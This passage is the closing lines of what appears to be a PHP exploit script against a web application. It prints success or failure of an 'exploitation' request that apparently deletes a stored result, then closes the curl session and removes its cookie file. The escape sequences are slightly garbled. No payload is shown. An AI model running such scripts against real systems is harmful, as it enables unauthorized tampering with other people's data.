    echo "[+] Response: $ajax_responsen";
} else {
    echo "[-] Exploitation failed or result already deletedn";
    echo "[-] Response: $ajax_responsen";
}

curl_close($ch);

// Clean up cookie file
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}
?>